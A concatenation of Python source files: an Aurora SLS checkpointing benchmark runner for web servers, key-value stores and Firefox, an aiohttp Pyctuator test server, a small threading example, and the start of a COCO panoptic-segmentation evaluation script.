stdout=subprocess.PIPE).stdout.decode('UTF-8')
pids = sorted(map(int, output.strip().split()))
return pids[0]
# Create directories in the SLOS to be used by the benchmarks. By appropriately
# modifying the configuration files, and building a directory tree similar to
# that present at the root, we can ensure benchmarks only create files in the
# SLOS, and are therefore definitely checkpointable.
def make_slsdirs(options, benchmark):
folders = ["data", "log", "log/" + benchmark, "logs",
"tmp", "var", "var/cache", "var/cache/" + benchmark,
"var/run", "var/run/" + benchmark, benchmark]
for folder in folders:
path = "{}/{}".format(options.mountdir, folder)
try:
Path(path).mkdir(exist_ok=True)
except OSError as err:
# It's fine if the file already exists
if err.errno != errno.EEXIST:
print("Error {} creating folder {}".format(err, folder))
raise
# Insert a series of PIDs into a partition and start checkpointing them.
def slsckpt(options, pidlist):
print("Starting Aurora Checkpointer on {} (period {})".format(
str(pidlist), options.slsperiod))
# If period is 0 we do not put the PIDs in the SLS.
if options.slsperiod == 0:
return
if not (options.type in ["slos", "memory"]):
raise Exception("Invalid SLS backend {}".format(options.type))
cmd = [options.slsctl, "partadd",
"-o", options.oid, "-b", options.type,
"-t", str(options.slsperiod)]
if options.delta:
cmd.append("-d")
if options.ignore_unlinked:
cmd.append("-i")
bashcmd(cmd)
for pid in pidlist:
cmd = [options.slsctl, "attach", "-o", options.oid, "-p", str(pid)]
bashcmd(cmd)
cmd = [options.slsctl, "checkpoint", "-o", options.oid]
if options.recursive:
cmd.append("-r")
bashcmd(cmd)
print("Started Aurora Checkpointer on {}".format(str(pidlist)))
# Generate a configuration from a template
def generate_conf(options, inputconf, outputconf):
# The templated variables.
replace_list = [
["SLS_MOUNT", options.mountdir],
["SLS_SERVER_URL", options.benchaddr],
["SLS_SERVER_PORT", options.benchport]
]
# Search and replace all template strings in the files. The way we specify
# the path makes it necessary for us to be in the base SLS directory when
# running the script, we need to change it in the future.
with open(inputconf, 'r') as templatefile:
with open(outputconf, 'w+') as conffile:
for line in templatefile:
for x in replace_list:
line = line.replace(x[0], x[1])
conffile.write(line)
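# Illustrative example (the template line below is hypothetical, not taken from
# the shipped config templates): an entry such as
#   document-root = "SLS_MOUNT/nginx"
# would be rewritten by generate_conf() to
#   document-root = "/slsmnt/nginx"
# when options.mountdir is /slsmnt; SLS_SERVER_URL and SLS_SERVER_PORT are
# substituted with options.benchaddr and options.benchport in the same way.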
# Create a configuration file for the web server so that it only uses files in
# the SLS. This is needed to be able to checkpoint filesystem state.
def webserver_createconf(options, inputconf, outputconf, srvconf):
# Link the original directory used by the server into the SLOS. Done so we
# can control the working directory of the server.
os.symlink(srvconf, "{}/{}".format(options.mountdir, options.server))
# Create the folders the web server expects to find at specific places.
# We create the lighttpd/nginx configuration from a template we have
# already constructed, so the file already includes the modified folder
# paths we are creating here.
make_slsdirs(options, options.server)
# Generate the configuration file
generate_conf(options, inputconf, outputconf)
# Start the lighttpd server
def lighttpd_setup(options, inputconf, outputconf, srvconf):
    # Get the current directory, so that we can switch back to it later.
pwd = os.getcwd()
# Create the configuration
webserver_createconf(options, inputconf, outputconf, srvconf)
os.chdir(options.mountdir)
# Start lighttpd using the new config file.
cmd = [options.lighttpd, '-f', outputconf]
bashcmd(cmd)
os.chdir(pwd)
# Get the PID of the newly created server.
return pid_main("lighttpd")
# Start the lighttpd server
def nginx_setup(options, inputconf, outputconf, srvconf):
    # Get the current directory, so that we can switch back to it later.
pwd = os.getcwd()
# Create the configuration
webserver_createconf(options, inputconf, outputconf, srvconf)
os.chdir(options.mountdir)
# Start nginx using the new config file.
cmd = [options.nginx, '-c', outputconf]
bashcmd(cmd)
os.chdir(pwd)
# Get the PID of the newly created server. There is a master nginx process
# and a set of worker processes. Assuming non-random PIDs, the smallest PID
# is the original process, so we get the output of pidof and parse it to
# select the smallest possible process.
return pid_main("nginx")
def tomcat_setup(options):
# Call the startup script
bashcmd("{}/{}".format(options.tomcat, "/bin/startup.sh"))
options.benchport = "8080"
time.sleep(5)
return pid_main("java")
def webserver_setup(options):
# Apart from selecting the right setup function to call, set the path of
# the configuration to be used and the output configuration. No need for
# special OS path join methods, since we can only possibly run on FreeBSD
# anyway.
if options.server == "nginx":
return nginx_setup(options,
inputconf="benchmarks/nginx.conf",
outputconf="{}/{}".format(options.mountdir,
"nginx/nginx.conf"),
srvconf=options.nginxconfdir
)
elif options.server == "lighttpd":
return lighttpd_setup(options,
inputconf="benchmarks/lighttpd.conf",
outputconf="{}/{}".format(options.mountdir,
"lighttpd/lighttpd.conf"),
srvconf=options.lighttpdconfdir
)
elif options.server == "tomcat":
return tomcat_setup(options)
else:
raise Exception("Invalid server {}".format(options.server))
# Command for spinning up a webserver and taking numbers
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
# Default locations of the binaries and config files
['--lighttpd'],
{
"action": "store",
"default": "/usr/local/sbin/lighttpd",
"help": "Location of lighttpd"
}
],
[
['--nginx'],
{
"action": "store",
"default": "/usr/local/sbin/nginx",
"help": "Location of nginx"
}
],
[
['--tomcat'],
{
"action": "store",
"default": "/usr/local/apache-tomcat-9.0",
"help": "Location of Apache Tomcat directory"
}
],
[
['--lighttpdconfdir'],
{
"action": "store",
"default": "/usr/local/etc/lighttpd",
"help": "Location of lighttpd config dir",
}
],
[
['--nginxconfdir'],
{
"action": "store",
"default": "/usr/local/etc/nginx",
"help": "Location of nginx config dir",
}
],
[
['--server'],
{
"action": "store",
"default": "nginx",
"help": "Standard web server to use",
}
],
[
['--threads'],
{
"action": "store",
"default": "10",
"help": "Number of client threads to use"
}
],
[
['--connections'],
{
"action": "store",
"default": "50",
"help": "Number of connections used by wrk",
}
],
[
['--time'],
{
"action": "store",
"default": "10",
"help": "Duration of the benchmark in seconds",
}
],
],
help="Run a web server sls workload")
def webserver(options):
# XXX Replace with module_init?
load(options)
# Start lighttpd
pid = webserver_setup(options)
# Begin the SLS
if (options.type in ["slos", "memory"]):
slsckpt(options, [pid])
options.runstart = datetime.datetime.now()
# Run the benchmark.
ssh = sshcmd(options)
wrk = ["wrk", "-d", str(options.time), "-t", str(options.threads),
"-c", str(options.connections),
"http://{}:{}".format(options.benchaddr, options.benchport)]
wrkoutput = subprocess.run(ssh + wrk,
stdout=subprocess.PIPE).stdout.decode('UTF-8')
options.ckpt_done = int(sysctl_sls("ckpt_done"))
options.ckpt_attempted = int(sysctl_sls("ckpt_attempted"))
options.runend = datetime.datetime.now()
with open("{}_{}_{}".format(str(options.server), str(options.slsfreq),
str(options.runno)), "w") as outfile:
outfile.write(wrkoutput)
# Kill the server
cmd = ['kill', '-9', str(pid)]
bashcmd(cmd)
time_elapsed = options.runend - options.runstart
ms_elapsed = (time_elapsed.seconds * 1000) + \
(time_elapsed.microseconds / 1000)
print("Did {} checkpoints in {}ms)".format(options.ckpt_done, ms_elapsed))
# XXX Replace with module_fini?
unload(options)
def redis_setup(options):
# Get the current directory, so that we can switch back to it later.
pwd = os.getcwd()
# XXX Make them defaults with the Redis command somehow
inputconfig = "benchmarks/redis.conf"
outputconf = "{}/{}".format(options.mountdir, "redis.conf")
generate_conf(options, inputconfig, outputconf)
# Create the configuration
os.chdir(options.mountdir)
make_slsdirs(options, "redis")
# Start lighttpd using the new config file.
cmd = [options.redis, outputconf]
bashcmd(cmd)
os.chdir(pwd)
# Get the PID of the newly created server. There is a master nginx process
# and a set of worker processes. Assuming non-random PIDs, the smallest PID
# is the original process, so we get the output of pidof and parse it to
# select the smallest possible process.
return pid_main("redis-server")
def memcached_setup(options):
# Get the current directory, so that we can switch back to it later.
pwd = os.getcwd()
make_slsdirs(options, "memcached")
# Create the directory for the PID file
cmd = ["memcached", "-u", options.memcacheduser, "-l", options.benchaddr,
"-p", options.benchport, "-P", "{}/{}".format(options.mountdir,
"memcached.pid"), "-d"]
bashcmd(cmd)
# Switch back to the original directory.
os.chdir(pwd)
return pid_main("memcached")
# Command for spinning up a webserver and taking numbers
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
# Default locations of the binaries and config files
['--redis'],
{
"action": "store",
"default": "/usr/local/bin/redis-server",
"help": "Location of the Redis server"
}
],
[
# Default locations of the binaries and config files
['--ycsb'],
{
"action": "store",
"default": "/home/etsal/ycsb/",
"help": "Location of the YCSB directory"
}
],
[
['--recordcount'],
{
"action": "store",
"default": str(10 * 1000),
"help": "Number of records to be loaded into the database"
}
],
[
['--workload'],
{
"action": "store",
"default": "workloada",
"help": "Workload profile to be used with YCSB"}
],
[
['--kvstore'],
{
"action": "store",
"default": "redis",
"help": "The key-value store to be benchmarked",
}
],
[
['--memcached'],
{
"action": "store",
"default": "/usr/local/bin/memcached",
"help": "Location of the memcached server"
}
],
[
['--memcacheduser'],
{
"action": "store",
"default": "root",
"help": "User under which memcached runs"
}
],
[
["--ycsbthreads"],
{
"action": "store",
"default": "16",
"help": "Number of threads for the YCSB client"
}
],
[
["--operationcount"],
{
"action": "store",
"default": str(100 * 1000),
"help": "Number of target operations from the YCSB client"
}
],
],
help="Run the Redis server")
def kvstore(options):
# XXX Replace with module_init?
load(options)
# Start lighttpd
if options.kvstore == "redis":
pid = redis_setup(options)
elif options.kvstore == "memcached":
pid = memcached_setup(options)
else:
raise Exception("Invalid options.kvstore {}".format(options.kvstore))
if pid is None:
raise Exception("No PID for process")
# Warm it up using YCSB. We can do this locally, but then we would need two
# version of YCSB - one collocated with the database, and one remote.
ssh = sshcmd(options)
cmd = ycsbcmd(options, "load", options.kvstore)
ycsboutput = subprocess.run(ssh + cmd,
stdout=subprocess.DEVNULL)
# Insert the server into the SLS.
if (options.type in ["slos", "memory"]):
slsckpt(options, [pid])
options.runstart = datetime.datetime.now()
# SSH into the remote and start the benchmark.
# XXX Parse it into a form we can use for graphing.
cmd = ycsbcmd(options, "run", options.kvstore)
ycsboutput = subprocess.run(ssh + cmd,
stdout=subprocess.PIPE).stdout.decode('UTF-8')
options.ckpt_done = int(sysctl_sls("ckpt_done"))
options.ckpt_attempted = int(sysctl_sls("ckpt_attempted"))
options.runend = datetime.datetime.now()
with open("{}_{}_{}".format(str(options.kvstore), str(options.slsfreq),
str(options.runno)), "w") as outfile:
outfile.write(ycsboutput)
# Kill the server
cmd = ['kill', '-9', str(pid)]
bashcmd(cmd)
# XXX Measure time
# print("{} checkpoints (expected around {})".format(
# sysctl_sls("ckpt_done"),
# (1000 / int(options.slsperiod)) * sleeptime))
# Wait for a bit to avoid races # XXX Necessary?
time.sleep(3)
time_elapsed = options.runend - options.runstart
ms_elapsed = (time_elapsed.seconds * 1000) + \
(time_elapsed.microseconds / 1000)
print("Did {} checkpoints in {}ms)".format(options.ckpt_done, ms_elapsed))
# XXX Replace with module_fini?
unload(options)
# Command for spinning up a webserver and taking numbers
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
['--memcached'],
{
"action": "store",
"default": "/usr/local/bin/memcached",
"help": "Location of the memcached server"
}
],
[
['--memcacheduser'],
{
"action": "store",
"default": "root",
"help": "User under which memcached runs"
}
],
[
['--mutilate'],
{
"action": "store",
"default": "/home/ali/working/mutilate/mutilate",
"help": "Location of mutilate"
}
],
[
['--mutilatethreads'],
{
"action": "store",
"default": "12",
"help": "Number of mutilate threads"
}
]
],
help="Run the memcached/mutilate")
def mutilate(options):
load(options)
# Start mutilate
pid = memcached_setup(options)
if pid is None:
raise Exception("No PID for process")
time.sleep(1)
# Load database
ssh = sshcmd(options, host=0)
cmd = mutilatecmd(options, "--loadonly")
bashcmd(ssh + cmd)
# Insert the server into the SLS.
if (options.type in ["slos", "memory"]):
slsckpt(options, [pid])
# SSH into the remote and start agents and main.
agents = []
for n in range(numhosts(options) - 1):
print("Spawning " + options.clients[n])
cmd = [options.mutilate, "-T", "12", "-A"]
ssh = sshcmd(options, host=n + 1)
print(ssh + cmd)
proc = subprocess.Popen(ssh + cmd)
agents.append(proc)
time.sleep(10)
options.runstart = datetime.datetime.now()
cmd = mutilatecmd(options, "--noload", "-B",
"-T", options.mutilatethreads, # Threads (loadgen)
"-c", "12", # Connections Per Thread (loadgen)
"-Q", "1000", # Measurement QPS
"-C", "4", # Measurement Connections
"-w", "5", # Warmup
"-t", "10") # Duration
for n in range(numhosts(options) - 1):
cmd = cmd + ["-a", options.clients[n]]
ssh = sshcmd(options, host=0)
print(ssh + cmd)
p = subprocess.run(ssh + cmd, stdout=subprocess.PIPE)
out = p.stdout.decode('UTF-8')
with open("{}_{}_{}".format("memcached_mutilate",
str(options.slsfreq),
str(options.runno)), "w") as outfile:
outfile.write(out)
for c in agents:
c.kill()
options.ckpt_done = int(sysctl_sls("ckpt_done"))
options.ckpt_attempted = int(sysctl_sls("ckpt_attempted"))
options.runend = datetime.datetime.now()
# Kill the server
bashcmd(['kill', '-9', str(pid)])
# Wait for kill
# XXX: we should retry
time.sleep(3)
unload(options)
# Command for spinning up a webserver and taking numbers
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
['--memcached'],
{
"action": "store",
"default": "/usr/local/bin/memcached",
"help": "Location of the memcached server"
}
],
[
['--memcacheduser'],
{
"action": "store",
"default": "root",
"help": "User under which memcached runs"
}
],
[
['--mutilate'],
{
"action": "store",
"default": "/home/ali/working/mutilate/mutilate",
"help": "Location of mutilate"
}
],
[
['--mutilatethreads'],
{
"action": "store",
"default": "12",
"help": "Number of mutilate threads"
}
]
],
help="Run the memcached/mutilate multiple times")
def mutilatebench(options):
for slsfreq in [0, 1] + list(range(10, 101, 10)):
for i in range(0, 5):
options.slsfreq = slsfreq
options.slsperiod = int((1000 / slsfreq)) if slsfreq != 0 else 0
options.runno = str(i + 1)
# XXX How to call the decorator before the thing
mutilate(options)
time_elapsed = options.runend - options.runstart
ms_elapsed = (time_elapsed.seconds * 1000) + \
(time_elapsed.microseconds / 1000)
print("Did {} checkpoints in {}ms)".format(
options.ckpt_done, ms_elapsed))
def firefox_benchmark(options):
ffoptions = Options()
ffoptions.add_argument('-headless')
profile = FirefoxProfile()
profile.DEFAULT_PREFERENCES['frozen']['network.http.spdy.enabled.http2'] = False
profile.DEFAULT_PREFERENCES['frozen']['browser.tabs.remote.autostart'] = False
profile.DEFAULT_PREFERENCES['frozen']['browser.tabs.remote.autostart.2'] = False
profile.DEFAULT_PREFERENCES['frozen']['autostarter.privatebrowsing.autostart'] = False
cap = DesiredCapabilities().FIREFOX
cap["marionette"] = True
driver = Firefox(firefox_binary=options.firefox, options=ffoptions,
firefox_profile=profile, capabilities=cap)
wait = WebDriverWait(driver, timeout=10000)
url = "http://{}:{}/{}".format(options.benchaddr, options.benchport,
options.firefoxdriver)
driver.get(url)
wait.until(lambda driver: "results" in driver.current_url)
values = urllib.parse.unquote(driver.current_url.split('?')[1])
vals = json.loads(values)
runtime = 0
for key, v in vals.items():
if (key != "v"):
runtime += sum(list(map(int, v)))
with open("{}_{}_{}".format("/root/sls/firefox",
str(options.slsfreq),
str(options.runno)), "w") as outfile:
outfile.write("Time: {} ms".format(runtime))
driver.close()
driver.quit()
# Command for spinning up a Firefox instance and taking numbers
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
# Default locations of the binaries and config files
['--firefox'],
{
"action": "store",
"default": "/usr/local/bin/firefox",
"help": "Location of the Firefox binary"
}
],
[
# Default path of the benchmark in the server
['--firefoxdriver'],
{
"action": "store",
"default": "/kraken-1.1/driver.html",
"help": "URL of the driver of the benchmark"
}
],
],
help="Run the Firefox JS benchmark")
def firefox(options):
# XXX Replace with module_init?
load(options)
random.seed()
# Choose a random port every time. Created sockets linger, so if want to be
# able to run the benchmark multiple times we need to use a different port
# each time.
options.benchaddr = "localhost"
options.benchport = str(random.randrange(8000, 16000))
# Create the server, serve forever. This is the server that _serves_ the
# benchmarks, not the benchmark that executes the JS and gets checkpointed.
serverpid = os.fork()
if serverpid == 0:
os.chdir("/root/sls-bench/firefox/hosted")
handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer((options.benchaddr,
int(options.benchport)), handler)
httpd.serve_forever()
# Spawn the new process. This is the process that ultimately spawns the
# benchmark driver that gets checkpointed.
benchpid = os.fork()
if benchpid == 0:
os.chdir(options.mountdir)
firefox_benchmark(options)
sys.exit()
time.sleep(3)
options.runstart = datetime.datetime.now()
# Begin the SLS.
if (options.type in ["slos", "memory"]):
slsckpt(options, [benchpid, serverpid])
# Wait for the benchmark to be done
os.waitpid(benchpid, 0)
options.ckpt_done = int(sysctl_sls("ckpt_done"))
options.ckpt_attempted = int(sysctl_sls("ckpt_attempted"))
options.runend = datetime.datetime.now()
# Kill the server and the driver
cmd = ['kill', '-15', str(serverpid)]
bashcmd(cmd, fail_okay=True)
# XXX Replace with module_fini?
unload(options)
@Command(required=["--server"],
captureOut=CapturedOut.MULTI,
# XXX Find a way to not repeat these, is it possible though with the
# way we're using the parser and building a global object?
add_args=[
[
# Default locations of the binaries and config files
['--lighttpd'],
{
"action": "store",
"default": "/usr/local/sbin/lighttpd",
"help": "Location of lighttpd"
}
],
[
['--nginx'],
{
"action": "store",
"default": "/usr/local/sbin/nginx",
"help": "Location of nginx"
}
],
[
['--tomcat'],
{
"action": "store",
"default": "/usr/local/apache-tomcat-9.0",
"help": "Location of Apache Tomcat directory"
}
],
[
['--lighttpdconfdir'],
{
"action": "store",
"default": "/usr/local/etc/lighttpd",
"help": "Location of lighttpd config dir",
}
],
[
['--nginxconfdir'],
{
"action": "store",
"default": "/usr/local/etc/nginx",
"help": "Location of nginx config dir",
}
],
[
['--threads'],
{
"action": "store",
"default": "10",
"help": "Number of client threads to use"
}
],
[
['--connections'],
{
"action": "store",
"default": "50",
"help": "Number of connections used by wrk",
}
],
[
['--time'],
{
"action": "store",
"default": "10",
"help": "Duration of the benchmark in seconds",
}
],
],
help="Run the webserver benchmark multiple times")
def webbench(options):
for slsfreq in list(range(10, 101, 10)):
for i in range(0, 5):
options.slsfreq = slsfreq
options.slsperiod = int((1000 / slsfreq)) if slsfreq != 0 else 0
options.runno = str(i + 1)
# XXX How to call the decorator before the thing
webserver(options)
# Command for benchmarking a web server with multiple configurations
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
# Default locations of the binaries and config files
['--redis'],
{
"action": "store",
"default": "/usr/local/bin/redis-server",
"help": "Location of the Redis server"
}
],
[
# Default locations of the binaries and config files
['--ycsb'],
{
"action": "store",
"default": "/home/etsal/ycsb/",
"help": "Location of the YCSB directory"
}
],
[
['--recordcount'],
{
"action": "store",
"default": str(10 * 1000),
"help": "Number of records to be loaded into the database"
}
],
[
['--workload'],
{
"action": "store",
"default": "workloada",
"help": "Workload profile to be used with YCSB"}
],
[
['--kvstore'],
{
"action": "store",
"default": "redis",
"help": "The key-value store to be benchmarked",
}
],
[
['--memcached'],
{
"action": "store",
"default": "/usr/local/bin/memcached",
"help": "Location of the memcached server"
}
],
[
['--memcacheduser'],
{
"action": "store",
"default": "root",
"help": "User under which memcached runs"
}
],
[
["--ycsbthreads"],
{
"action": "store",
"default": "16",
"help": "Number of threads for the YCSB client"
}
],
[
["--operationcount"],
{
"action": "store",
"default": str(1000 * 1000),
"help": "Number of target operations from the YCSB client"
}
],
],
help="Run the Redis server")
def kvbench(options):
for slsfreq in [0, 1] + list(range(10, 101, 10)):
for i in range(0, 5):
options.slsfreq = slsfreq
options.slsperiod = int((1000 / slsfreq)) if slsfreq != 0 else 0
options.runno = str(i + 1)
# XXX How to call the decorator before the thing
kvstore(options)
# Command for spinning up a webserver and taking numbers
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
# Default locations of the binaries and config files
['--firefox'],
{
"action": "store",
"default": "/usr/local/bin/firefox",
"help": "Location of the Firefox binary"
}
],
[
# Default path of the benchmark in the server
['--firefoxdriver'],
{
"action": "store",
"default": "/kraken-1.1/driver.html",
"help": "URL of the driver of the benchmark"
}
],
],
help="Run the Firefox JS benchmark on a loop")
def ffbench(options):
for slsfreq in [0, 1] + list(range(10, 101, 10)):
for i in range(0, 1):
options.slsfreq = slsfreq
options.slsperiod = int((1000 / slsfreq)) if slsfreq != 0 else 0
options.runno = str(i + 1)
# XXX How to call the decorator before the thing
firefox(options)
time_elapsed = options.runend - options.runstart
ms_elapsed = (time_elapsed.seconds * 1000) + \
(time_elapsed.microseconds / 1000)
print("Did {} checkpoints in {}ms)".format(
options.ckpt_done, ms_elapsed))
@Command()
def rocksdb(options):
bashcmd(["benchmarks/rocksdb.sh", options.mountdir])
def main():
global parser
global subparser
options = parser.parse_args()
options.func(options)
if __name__ == "__main__":
main()
|
aiohttp_test_server.py
|
import asyncio
import logging
import threading
import time
import requests
from aiohttp import web
from pyctuator.pyctuator import Pyctuator
from tests.conftest import PyctuatorServer
# mypy: ignore_errors
# pylint: disable=unused-variable
class AiohttpPyctuatorServer(PyctuatorServer):
def __init__(self) -> None:
self.app = web.Application()
self.routes = web.RouteTableDef()
self.pyctuator = Pyctuator(
self.app,
"AIOHTTP Pyctuator",
"http://localhost:8888",
"http://localhost:8888/pyctuator",
"http://localhost:8001/register",
registration_interval_sec=1,
)
@self.routes.get("/logfile_test_repeater")
async def logfile_test_repeater(request: web.Request) -> web.Response:
repeated_string = request.query.get("repeated_string")
logging.error(repeated_string)
return web.Response(text=repeated_string)
@self.routes.get("/httptrace_test_url")
async def get_httptrace_test_url(request: web.Request) -> web.Response:
# Sleep if requested to sleep - used for asserting httptraces timing
sleep_sec = request.query.get("sleep_sec")
if sleep_sec:
logging.info("Sleeping %s seconds before replying", sleep_sec)
time.sleep(int(sleep_sec))
# Echo 'User-Data' header as 'resp-data' - used for asserting headers are captured properly
return web.Response(headers={"resp-data": str(request.headers.get("User-Data"))}, body="my content")
self.app.add_routes(self.routes)
self.thread = threading.Thread(target=self._start_in_thread)
self.should_stop_server = False
self.server_started = False
async def _run_server(self) -> None:
runner = web.AppRunner(self.app)
await runner.setup()
site = web.TCPSite(runner, "localhost", 8888)
await site.start()
self.server_started = True
while not self.should_stop_server:
await asyncio.sleep(1)
await runner.shutdown()
await runner.cleanup()
def _start_in_thread(self) -> None:
loop = asyncio.new_event_loop()
loop.run_until_complete(self._run_server())
loop.stop()
def start(self) -> None:
self.thread.start()
while not self.server_started:
time.sleep(0.01)
def stop(self) -> None:
self.pyctuator.stop()
self.should_stop_server = True
self.thread.join()
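# Usage sketch (an assumption about how a test might drive this class; the
# actual fixtures live alongside tests/conftest.py):
#
#   server = AiohttpPyctuatorServer()
#   server.start()   # returns once the aiohttp site is listening on :8888
#   ...              # exercise http://localhost:8888/pyctuator and the test routes
#   server.stop()    # stops Pyctuator, signals the loop to exit, joins the thread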
|
thread.py
|
from threading import Thread
#func(arg)
#{
#function body
#}
#main loop()
#{
#loop body
#variable = Thread(target=func, args=(arg,))   # args must be a tuple
#variable.start()
#loop body continues
#}
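# A minimal runnable sketch of the pattern described in the comments above; the
# names `worker` and `item` and the loop bounds are illustrative, not from the
# original notes.
import time

def worker(item):
    # function body: do some work with the argument passed in
    print("processing", item)
    time.sleep(0.1)

if __name__ == "__main__":
    threads = []
    # main loop: spawn a thread per item and keep iterating without blocking
    for item in range(3):
        t = Thread(target=worker, args=(item,))  # args must be a tuple
        t.start()
        threads.append(t)
        # loop body continues while the worker runs in the background
    for t in threads:
        t.join()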
|
eval_coco_format.py
|
# Copyright 2019 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Computes evaluation metrics on groundtruth and predictions in COCO format.
The Common Objects in Context (COCO) dataset defines a format for specifying
combined semantic and instance segmentations as "panoptic" segmentations. This
is done with the combination of JSON and image files as specified at:
http://cocodataset.org/#format-results
where the JSON file specifies the overall structure of the result,
including the categories for each annotation, and the images specify the image
region for each annotation in that image by its ID.
This script computes additional metrics such as Parsing Covering on datasets and
predictions in this format. An implementation of Panoptic Quality is also
provided for convenience.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import multiprocessing
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
from PIL import Image
import utils as panopticapi_utils
import six
from new_deeplab.evaluation import panoptic_quality
from new_deeplab.evaluation import parsing_covering
FLAGS = flags.FLAGS
flags.DEFINE_string(
'gt_json_file', None,
    'Path to a JSON file giving ground-truth annotations in COCO format.')
flags.DEFINE_string('pred_json_file', None,
'Path to a JSON file for the predictions to evaluate.')
flags.DEFINE_string(
'gt_folder', None,
'Folder containing panoptic-format ID images to match ground-truth '
'annotations to image regions.')
flags.DEFINE_string('pred_folder', None,
'Folder containing ID images for predictions.')
flags.DEFINE_enum(
'metric', 'pq', ['pq', 'pc'], 'Shorthand name of a metric to compute. '
'Supported values are:\n'
'Panoptic Quality (pq)\n'
'Parsing Covering (pc)')
flags.DEFINE_integer(
'num_categories', 201,
'The number of segmentation categories (or "classes") in the dataset.')
flags.DEFINE_integer(
'ignored_label', 0,
'A category id that is ignored in evaluation, e.g. the void label as '
'defined in COCO panoptic segmentation dataset.')
flags.DEFINE_integer(
'max_instances_per_category', 256,
'The maximum number of instances for each category. Used in ensuring '
'unique instance labels.')
flags.DEFINE_integer('intersection_offset', None,
'The maximum number of unique labels.')
flags.DEFINE_bool(
'normalize_by_image_size', True,
'Whether to normalize groundtruth instance region areas by image size. If '
'True, groundtruth instance areas and weighted IoUs will be divided by the '
'size of the corresponding image before accumulated across the dataset. '
'Only used for Parsing Covering (pc) evaluation.')
flags.DEFINE_integer(
'num_workers', 0, 'If set to a positive number, will spawn child processes '
'to compute parts of the metric in parallel by splitting '
'the images between the workers. If set to -1, will use '
'the value of multiprocessing.cpu_count().')
flags.DEFINE_integer('print_digits', 3,
'Number of significant digits to print in metrics.')
def _build_metric(metric,
num_categories,
ignored_label,
max_instances_per_category,
intersection_offset=None,
normalize_by_image_size=True):
"""Creates a metric aggregator objet of the given name."""
if metric == 'pq':
logging.warning('One should check Panoptic Quality results against the '
'official COCO API code. Small numerical differences '
'(< 0.1%) can be magnified by rounding.')
return panoptic_quality.PanopticQuality(num_categories, ignored_label,
max_instances_per_category,
intersection_offset)
elif metric == 'pc':
return parsing_covering.ParsingCovering(
num_categories, ignored_label, max_instances_per_category,
intersection_offset, normalize_by_image_size)
else:
raise ValueError('No implementation for metric "%s"' % metric)
def _matched_annotations(gt_json, pred_json):
"""Yields a set of (groundtruth, prediction) image annotation pairs.."""
image_id_to_pred_ann = {
annotation['image_id']: annotation
for annotation in pred_json['annotations']
}
for gt_ann in gt_json['annotations']:
image_id = gt_ann['image_id']
pred_ann = image_id_to_pred_ann[image_id]
yield gt_ann, pred_ann
def _open_panoptic_id_image(image_path):
"""Loads a COCO-format panoptic ID image from file."""
return panopticapi_utils.rgb2id(
np.array(Image.open(image_path), dtype=np.uint32))
def _split_panoptic(ann_json, id_array, ignored_label, allow_crowds):
"""Given the COCO JSON and ID map, splits into categories and instances."""
category = np.zeros(id_array.shape, np.uint16)
instance = np.zeros(id_array.shape, np.uint16)
next_instance_id = collections.defaultdict(int)
# Skip instance label 0 for ignored label. That is reserved for void.
next_instance_id[ignored_label] = 1
for segment_info in ann_json['segments_info']:
if allow_crowds and segment_info['iscrowd']:
category_id = ignored_label
else:
category_id = segment_info['category_id']
mask = np.equal(id_array, segment_info['id'])
category[mask] = category_id
instance[mask] = next_instance_id[category_id]
next_instance_id[category_id] += 1
return category, instance
def _category_and_instance_from_annotation(ann_json, folder, ignored_label,
allow_crowds):
"""Given the COCO JSON annotations, finds maps of categories and instances."""
panoptic_id_image = _open_panoptic_id_image(
os.path.join(folder, ann_json['file_name']))
return _split_panoptic(ann_json, panoptic_id_image, ignored_label,
allow_crowds)
def _compute_metric(metric_aggregator, gt_folder, pred_folder,
annotation_pairs):
"""Iterates over matched annotation pairs and computes a metric over them."""
for gt_ann, pred_ann in annotation_pairs:
# We only expect "iscrowd" to appear in the ground-truth, and not in model
# output. In predicted JSON it is simply ignored, as done in official code.
gt_category, gt_instance = _category_and_instance_from_annotation(
gt_ann, gt_folder, metric_aggregator.ignored_label, True)
pred_category, pred_instance = _category_and_instance_from_annotation(
pred_ann, pred_folder, metric_aggregator.ignored_label, False)
metric_aggregator.compare_and_accumulate(gt_category, gt_instance,
pred_category, pred_instance)
return metric_aggregator
def _iterate_work_queue(work_queue):
"""Creates an iterable that retrieves items from a queue until one is None."""
task = work_queue.get(block=True)
while task is not None:
yield task
task = work_queue.get(block=True)
def _run_metrics_worker(metric_aggregator, gt_folder, pred_folder, work_queue,
result_queue):
result = _compute_metric(metric_aggregator, gt_folder, pred_folder,
_iterate_work_queue(work_queue))
result_queue.put(result, block=True)
def _is_thing_array(categories_json, ignored_label):
"""is_thing[category_id] is a bool on if category is "thing" or "stuff"."""
is_thing_dict = {}
for category_json in categories_json:
is_thing_dict[category_json['id']] = bool(category_json['isthing'])
# Check our assumption that the category ids are consecutive.
# Usually metrics should be able to handle this case, but adding a warning
# here.
max_category_id = max(six.iterkeys(is_thing_dict))
if len(is_thing_dict) != max_category_id + 1:
seen_ids = six.viewkeys(is_thing_dict)
all_ids = set(six.moves.range(max_category_id + 1))
unseen_ids = all_ids.difference(seen_ids)
if unseen_ids != {ignored_label}:
logging.warning(
'Nonconsecutive category ids or no category JSON specified for ids: '
'%s', unseen_ids)
is_thing_array = np.zeros(max_category_id + 1)
for category_id, is_thing in six.iteritems(is_thing_dict):
is_thing_array[category_id] = is_thing
return is_thing_array
def eval_coco_format(gt_json_file,
pred_json_file,
gt_folder=None,
pred_folder=None,
metric='pq',
num_categories=201,
ignored_label=0,
